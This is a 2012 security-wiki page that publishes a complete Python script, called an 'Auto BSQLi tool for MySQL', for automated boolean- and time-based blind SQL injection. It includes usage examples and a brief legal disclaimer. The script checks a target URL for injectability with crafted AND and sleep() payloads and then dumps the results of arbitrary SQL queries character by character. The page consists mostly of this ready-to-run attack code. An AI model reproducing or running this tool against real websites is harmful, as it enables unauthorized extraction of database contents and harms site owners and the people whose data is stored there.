Questions about this topic? Sign up to ask in the talk tab.

SQL injection/mysqli-blindutils/sqli-slee.py

From NetSec
Revision as of 16:31, 22 September 2012 by MinnaMichalik (Talk | contribs)

Jump to: navigation, search
c3el4.png
This script uses time and boolean based blind SQL injection to obtain the desired information from MySQL database.

Info

The syntax of this script is:

 python bsqli.py -u [url] -i [injection]

Example

 python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

RPU0j.png The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python
 
import sys,re,urllib,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
def request(URL):
  user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
  req = urllib2.Request(URL, None, user_agent)
 
  try:
    request = urllib2.urlopen(req)
 
  except HTTPError, e:
    print('[!] The server couldnt fulfill the request.')
    print('[!] Error code: ' + str(e.code))
    sys.exit(1)
 
  except URLError, e:
    print('[!] We failed to reach a server.')
    print('[!] Reason: ' + str(e.reason))
    sys.exit(1)
 
  return len(request.read())
 
def value(URL):
  target = 0
  end = 0
  next_maybe = 0
  floor = 0
  ceiling = 255
  maybe = int(ceiling)/2
 
  while(end != 9):
    if(is_what(URL, maybe, '>')):	
      floor = maybe
      next_maybe = int(maybe + ((ceiling - floor)/2))
 
    elif(is_what(URL, maybe, '<')):
      ceiling = maybe
      next_maybe = int(maybe - ((ceiling - floor)/2))
 
    elif(is_what(URL, maybe, '=')):
      return chr(maybe)
 
    maybe = next_maybe
    end += 1
 
  return 'done'
 
def is_what(URL, maybe, op):
  if(sqli_type == 'boolean'):
    ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
    if(TrueResponse == ValueResponse):
      return 1
    else:
      return 0
  elif(sqli_type == 'time'):
    start = time.time()
    ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')
    elapsed_time = (time.time() - start)
    if (elapsed_time > 2):
      return 1
    else:
      return 0
 
def vuln_check(URL):
  print('[+] Checking site...')
 
  global TrueResponse
  TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
  FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
 
  if(TrueResponse != FalseResponse):
    print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
    return 'boolean'
  else:
    start = time.time()
    SleepResponse = request(URL + '%20and%20sleep(5)--+')
    elapsed_time = (time.time() - start)
 
    if(elapsed_time > 5):
      print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
      return 'time'
    else:
      print('[!] Seems like site isnt vulnerable to blind SQL injection.')
      sys.exit(1)
 
def main():
  print('''
        Auto BSQLi tool for MySQL
        ''')
 
  usage = 'usage: %prog -u <target> -i <injection>'
  parser = OptionParser(usage=usage)
  parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
  parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
  (options, args) = parser.parse_args()
  if(options.URL and options.INJECTION):
    URL = options.URL
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))
  else:
    print('[!] Missing url or injection parameter.')
    print('[!] Use --help.')
    sys.exit(1)
 
  global sqli_type
  sqli_type = vuln_check(URL)
  position = 1
  dump = ''
  print('[+] Dumping data...')
 
  while(1):
    if(sqli_type == 'boolean'):
      letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
    elif(sqli_type == 'time'):
      letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
 
    if(letter == 'done'):
      break
 
    dump = dump + letter
    position += 1
 
  if(dump):
    print('[+] Data: ' + dump)
  else:
    print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":
  main()